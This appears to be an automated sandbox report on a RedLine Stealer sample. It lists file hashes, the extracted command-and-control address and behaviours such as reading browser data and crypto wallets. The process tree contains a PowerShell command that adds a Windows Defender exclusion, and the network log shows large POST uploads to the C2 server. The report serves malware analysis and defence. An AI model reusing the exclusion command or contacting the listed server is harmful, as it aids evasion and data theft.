Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
28/05/2021, 19:46 UTC
General
-
Target
a3111c47c0b8cc5405b80e0fee672213.exe
-
Size
815KB
-
MD5
a3111c47c0b8cc5405b80e0fee672213
-
SHA1
919e1912ade8b9891f6482fd1c2ded0b85361d0d
-
SHA256
1d857a8ee0c9851c6ddcd0dcc0ac0057e772f152883762ffbf50457b6c463fd5
-
SHA512
b3976e6e08602ae921c086a1246c46f5fc8a3fc93fefc72d01c75f50d13ec9d7b07f87981af504c9acef52f7b9cff6dbb33ef130398099a755adfddd5639e849
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
AdsCouponGeneratorV1.0.1
C2
194.233.74.11:35496
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
CustAttr .NET packer 1 IoCs
Detects CustAttr .NET packer in memory.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\a3111c47c0b8cc5405b80e0fee672213.exe"C:\Users\Admin\AppData\Local\Temp\a3111c47c0b8cc5405b80e0fee672213.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a3111c47c0b8cc5405b80e0fee672213.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\a3111c47c0b8cc5405b80e0fee672213.exe"C:\Users\Admin\AppData\Local\Temp\a3111c47c0b8cc5405b80e0fee672213.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
-
POSThttp://194.233.74.11:35496//Remote address:194.233.74.11:35496RequestPOST // HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 194.233.74.11:35496
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 4769
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 28 May 2021 13:48:12 GMT
-
POSThttp://194.233.74.11:35496//Remote address:194.233.74.11:35496RequestPOST // HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
Host: 194.233.74.11:35496
Content-Length: 4009569
Expect: 100-continue
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OK
Content-Length: 150
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 28 May 2021 13:48:19 GMT
-
POSThttp://194.233.74.11:35496//Remote address:194.233.74.11:35496RequestPOST // HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 194.233.74.11:35496
Content-Length: 4009555
Expect: 100-continue
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OK
Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 28 May 2021 13:48:19 GMT
-
DNSapi.ip.sbRemote address:8.8.8.8:53Requestapi.ip.sbIN AResponseapi.ip.sbIN CNAMEapi.ip.sb.cdn.cloudflare.netapi.ip.sb.cdn.cloudflare.netIN A172.67.75.172api.ip.sb.cdn.cloudflare.netIN A104.26.12.31api.ip.sb.cdn.cloudflare.netIN A104.26.13.31
-
GEThttps://api.ip.sb/geoipRemote address:172.67.75.172:443RequestGET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Fri, 28 May 2021 19:48:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 0a561e27ff0000414aceb3e000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=b3DlvxIkAJqh4ZD%2FaY27oPF2L9XV4f1WEjKYiHtP4xQox8A5%2B3efgfAEn33iZo5DyC%2B1JFOWziVhq1cGBCj8r4Iz3XYctoH9ozPeKyqKelXoCFs%2BSz8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 6569ffb99d67414a-HAM
-
194.233.74.11:35496http://194.233.74.11:35496//http
HTTP Request
POST http://194.233.74.11:35496//HTTP Response
200HTTP Request
POST http://194.233.74.11:35496//HTTP Response
200HTTP Request
POST http://194.233.74.11:35496//HTTP Response
200 -
172.67.75.172:443https://api.ip.sb/geoiptls, http
HTTP Request
GET https://api.ip.sb/geoipHTTP Response
200
-
8.8.8.8:53api.ip.sbdns
DNS Request
api.ip.sb
DNS Response
172.67.75.172104.26.12.31104.26.13.31
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
204KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
112KB
-
Filesize
6.0MB
-
Filesize
364KB
-
Filesize
4KB
-
Filesize
644KB
-
Filesize
5.0MB
-
Filesize
20KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB